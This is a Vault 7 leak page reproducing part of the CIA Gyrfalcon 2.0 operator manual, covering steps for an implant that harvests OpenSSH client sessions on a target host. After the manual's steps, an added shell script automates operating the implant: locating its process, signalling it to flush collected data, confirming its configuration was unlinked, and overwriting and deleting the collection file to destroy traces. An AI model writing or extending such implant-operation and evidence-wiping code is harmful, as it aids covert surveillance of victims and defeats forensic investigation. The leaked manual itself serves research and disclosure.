Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
SECRET//NOFORN Gyrfalcon 2.0
4.1 ps -aux | grep client
4.2 (U) Where client is the name of the Gyrfalcon application on the target platform. The grep process itself also matches the pattern; take the PID of the client process, not of grep.
5. (S//NF) Flush the last of the OpenSSH client collected data through the Gyrfalcon application
pipeline into the compressed, encrypted collection file and reload the encrypted configuration
file with the new configuration.
5.1 kill -s HUP PID
5.2 (U) Where PID is the PID discovered in step 4.
5.3 (S//NF) IMPORTANT: this time you need to use SIGHUP signal to flush the pipeline and
read the new encrypted configuration file into memory. DO NOT use SIGUSR1 here.
5.4 (S//NF) The application may not act on the HUP signal until data arrives on the SYSV message
queue. Monitor the collection file: once the application has closed it, the HUP signal was
handled correctly and it is safe to proceed.
6. (S//NF) Ensure the encrypted configuration file has been removed from the file system.
6.1 (S//NF) The application will securely unlink the encrypted configuration file from the file
system after successfully reading it into memory.
7. (S//NF) Download the compressed, encrypted collection file to the local operator computer.
7.1 (S//NF) Gyrfalcon does not provide any communication services between the local
operator computer and target platform. The operator must use another application to
download the collection file from the target platform.
8. (S//NF) Remove the compressed, encrypted collection file from the target platform's file system.
8.1 (S//NF) Hopefully, the decision was made to keep the collection file in the JQC/KitV
hidden directory.
8.2 dd if=/dev/zero of=./collect_file bs=64 count=N conv=notrunc
8.3 rm -f collect_file
8.4 Where N is the size of collect_file in bytes divided by 64, rounded up. Without count= dd
writes zeros until the file system is full, and without conv=notrunc it truncates the file before
writing, so the blocks that held the collected data may be released without being overwritten.
Overwriting in place does not reliably destroy data on journaling, copy-on-write or
wear-levelled (flash) storage.
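The operator-side sequence of steps 4 to 8 (locate the process, send SIGHUP, wait for the collection file to be closed, confirm the configuration file is gone, overwrite and unlink the collection file), as an added example. These shell helpers are not part of the Gyrfalcon manual or the tool itself; they assume a Linux target with /proc, keep the manual's placeholder names client and collect_file, use CONFIG_FILE as a placeholder for the encrypted configuration file whose name the page does not give, and replace the manual's dd line with one that bounds the write with count= and overwrites in place with conv=notrunc. All function names are this example's own.

```shell
#!/bin/sh
# Added example, not code from the Gyrfalcon manual. Assumes a Linux target
# (/proc) and the manual's placeholder names client / collect_file.

# Step 4: print the PID of every process whose command name (comm, 15 chars
# max) equals $1. Unlike "ps -aux | grep client" this never matches itself.
find_pid() {
    for c in /proc/[0-9]*/comm; do
        [ "$(cat "$c" 2>/dev/null)" = "$1" ] || continue
        p=${c#/proc/}; printf '%s\n' "${p%/comm}"
    done
}

# Step 5.1: flush the pipeline and reload the encrypted config (HUP, not USR1).
signal_reload() { kill -s HUP "$1"; }

# Step 5.4: does PID $1 still hold $2 open? Compare its fd symlinks to the path.
file_is_open_by() {
    target=$(readlink -f -- "$2" 2>/dev/null || printf '%s' "$2")
    for fd in /proc/"$1"/fd/*; do
        [ "$(readlink "$fd" 2>/dev/null)" = "$target" ] && return 0
    done
    return 1
}

# Step 5.4: poll once a second until PID $1 has closed $2; give up after $3 s.
wait_until_closed() {
    i=0
    while file_is_open_by "$1" "$2"; do
        i=$((i + 1)); [ "$i" -lt "$3" ] || return 1
        sleep 1
    done
    return 0
}

# Step 6: the application should have unlinked the config after reading it.
config_removed() {
    [ ! -e "$1" ] || { echo "config still present: $1" >&2; return 1; }
}

# Steps 8.2/8.3: zero the file's own blocks (bounded, in place), then unlink.
# count= stops dd at the file size; conv=notrunc keeps the existing blocks
# instead of truncating and reallocating. The last partial 64-byte block is
# rounded up, so the file may grow by a few bytes before it is removed.
wipe_file() {
    f=$1; bs=64
    size=$(wc -c <"$f") || return 1
    blocks=$(( (size + bs - 1) / bs ))
    dd if=/dev/zero of="$f" bs="$bs" count="$blocks" conv=notrunc 2>/dev/null || return 1
    rm -f -- "$f"
}

# Typical run against a live instance (commented out; CONFIG_FILE is a placeholder):
#   pid=$(find_pid client)
#   signal_reload "$pid"
#   wait_until_closed "$pid" ./collect_file 60 || echo "collection file still open" >&2
#   config_removed CONFIG_FILE
#   # ...download ./collect_file over a channel Gyrfalcon does not provide...
#   wipe_file ./collect_file
```

The in-place overwrite is only as good as the storage underneath it: journaling, copy-on-write and wear-levelled flash file systems may keep the original blocks regardless, so the manual's step 8 should be read as reducing, not eliminating, recoverable traces.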
14 SECRET//NOFORN//20381126 November 2013